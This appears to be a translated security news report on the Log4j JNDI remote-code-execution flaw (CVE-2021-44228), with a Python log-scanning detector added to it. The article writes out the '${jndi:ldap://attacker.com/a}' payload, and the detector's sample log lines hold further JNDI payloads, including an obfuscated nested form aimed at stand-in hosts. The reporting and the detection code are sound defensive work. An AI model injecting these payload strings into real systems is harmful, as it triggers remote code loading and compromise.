Critical vulnerability in Apache Log4j affecting many Java projects

A critical vulnerability has been identified in Apache Log4j, a popular framework for organizing logging in Java applications, that allows arbitrary code to be executed when a specially formatted value of the form "${jndi:URL}" is written to the log. The attack can be carried out against Java applications that log values obtained from external sources, for example when problematic values are displayed in error messages.

It is noted that almost all projects using frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected by the problem, including Steam, Apple iCloud, and Minecraft clients and servers. The vulnerability is expected to lead to a wave of mass attacks on corporate applications, repeating the history of critical vulnerabilities in the Apache Struts framework, which, by rough estimates, is used in the web applications of 65% of Fortune 100 companies. Attempts to scan the network for vulnerable systems have already been recorded.

The problem is aggravated by the fact that a working exploit has already been published, while fixes for the stable branches have not yet been prepared. A CVE identifier has not yet been assigned. The fix is included only in the log4j-2.15.0-rc1 test branch. As a workaround to block the vulnerability, it is recommended to set the log4j2.formatMsgNoLookups parameter to true.

The problem is caused by log4j supporting the processing of special "{}" masks in lines written to the log, within which JNDI (Java Naming and Directory Interface) queries can be executed. The attack boils down to passing a string containing the substitution "${jndi:ldap://attacker.com/a}"; when processing it, log4j sends an LDAP request to the attacker.com server for the path to a Java class. The path returned by the attacker's server (for example, http://second-stage.attacker.com/Exploit.class) is loaded and executed in the context of the current process, allowing the attacker to execute arbitrary code on the system with the privileges of the current application.
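
The detection check a defender would want for the mechanism described above, written as an added example in Python that is not part of the original article: it pulls every "${...}" lookup expression out of web-server log lines (keeping nested braces balanced), flags lookups whose prefix is "jndi:" together with the LDAP host they point at, and separately flags nested lookups for review, since a nested expression can hide the prefix from a plain "${jndi:" string match. The log lines and hostnames are constructed for the example.

```python
import re

# Constructed sample access-log lines (hypothetical hosts, not from the article).
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:ldap://x.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET /price?amt=${ctx:userId} HTTP/1.1" 200 12 "-" "curl/7.79"',
]

# A lookup whose prefix is literally "jndi:"; captures the URL scheme and host.
JNDI_RE = re.compile(r"^\$\{\s*jndi:([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def extract_lookups(text: str) -> list:
    # Return every top-level ${...} expression, keeping nested braces balanced.
    found, i = [], 0
    while (start := text.find("${", i)) != -1:
        depth, j = 0, start
        while j < len(text):
            if text.startswith("${", j):
                depth, j = depth + 1, j + 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        found.append(text[start:j + 1])  # an unterminated tail is kept for review
        i = j + 1
    return found


def classify_lookup(expr: str) -> dict:
    # Direct JNDI lookup, a nested lookup that hides its prefix, or an ordinary lookup.
    m = JNDI_RE.match(expr)
    if m:
        return {"verdict": "jndi", "scheme": m.group(1).lower(), "host": m.group(2)}
    verdict = "nested" if "${" in expr[2:] else "benign"
    return {"verdict": verdict, "scheme": "", "host": ""}


def scan_log(lines: list) -> list:
    # Report every non-benign lookup together with the line number it came from.
    findings = []
    for n, line in enumerate(lines, start=1):
        for expr in extract_lookups(line):
            info = classify_lookup(expr)
            if info["verdict"] != "benign":
                findings.append({"line": str(n), "expr": expr, **info})
    return findings
```

The "host" field of a "jndi" finding is the value to feed into egress blocking and into correlation with outbound LDAP connections from the application host; "nested" findings are not resolved here and need a human or a fuller parser to decide.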

Addendum 1: The vulnerability has been assigned the identifier CVE-2021-44228.

Addendum 2: A way to bypass the protection added in the log4j-2.15.0-rc1 release has been identified. A new update, log4j-2.15.0-rc2, has been proposed with more complete protection against the vulnerability. The code highlights the change related to the absence of an abnormal termination when an incorrectly formatted JNDI URL is used.

Source: opennet.ru